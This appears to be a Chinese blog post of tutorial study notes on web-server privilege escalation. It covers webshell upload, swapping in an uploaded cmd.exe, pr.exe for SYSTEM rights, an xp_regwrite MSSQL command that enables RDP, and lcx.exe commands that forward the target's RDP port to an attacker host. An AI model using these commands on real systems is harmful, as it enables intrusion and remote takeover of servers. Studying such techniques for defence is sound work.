亲手把你推开的人,或许更希望让你留下来,可是,你不懂,我也没资格让你懂,这个世界已经不浪漫了。。。

---- 网易云热评

一、一般脚本所处的权限

1、asp/php 匿名权限

2、aspx user权限

3、jsp 系统权限

二、不同脚本,权限也不同

1、上传普通一句话木马,然后用菜刀连接

某教程学习笔记(一):20、权限提升_上传


2、进入终端,输入命令

某教程学习笔记(一):20、权限提升_web安全_02


3、我们上传一个大马,访问

某教程学习笔记(一):20、权限提升_上传_03


4、输入命令,可以正常执行

某教程学习笔记(一):20、权限提升_学习笔记_04


三、cmd无法执行1、上传一个大马,访问

某教程学习笔记(一):20、权限提升_权限提升_05


2、进入cmd命令界面,发现不能执行

某教程学习笔记(一):20、权限提升_权限提升_06


3、找一个可读写目录,上传本地的cmd.exe

某教程学习笔记(一):20、权限提升_学习笔记_07


4、把路径修改为我们上传的路径,执行命令

某教程学习笔记(一):20、权限提升_权限提升_08


四、PR提权一、执行whoami获取权限

某教程学习笔记(一):20、权限提升_学习笔记_09


二、上传pr.exe,重新获取权限,直接就是system权限

某教程学习笔记(一):20、权限提升_内网_10


五、MSSQL提权1、打开sqltools,输入ip、端口、用户名、密码、数据库名,然后点击连接,提示连接成功

某教程学习笔记(一):20、权限提升_内网_11


2、dos命令可以成功执行

某教程学习笔记(一):20、权限提升_web安全_12


3、连接3389提示错误

某教程学习笔记(一):20、权限提升_内网_13


4、执行下面命令,打开3389

exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–

5、继续连接3389端口

某教程学习笔记(一):20、权限提升_内网_14


内网

六、端口转发

1、将lcx.exe上传到服务器,运行

lcx.exe -slave 192.168.171.128(外网) 2222 127.0.0.1(内网) 3389

某教程学习笔记(一):20、权限提升_上传_15


2、在本地运行lcx.exe -listen 1111 2222

某教程学习笔记(一):20、权限提升_权限提升_16


3、打开远程桌面连接,输入127.0.0.1:2222,成功连接

某教程学习笔记(一):20、权限提升_内网_17


禁止非法,后果自负欢迎关注公众号:web安全工具库

某教程学习笔记(一):20、权限提升_web安全_18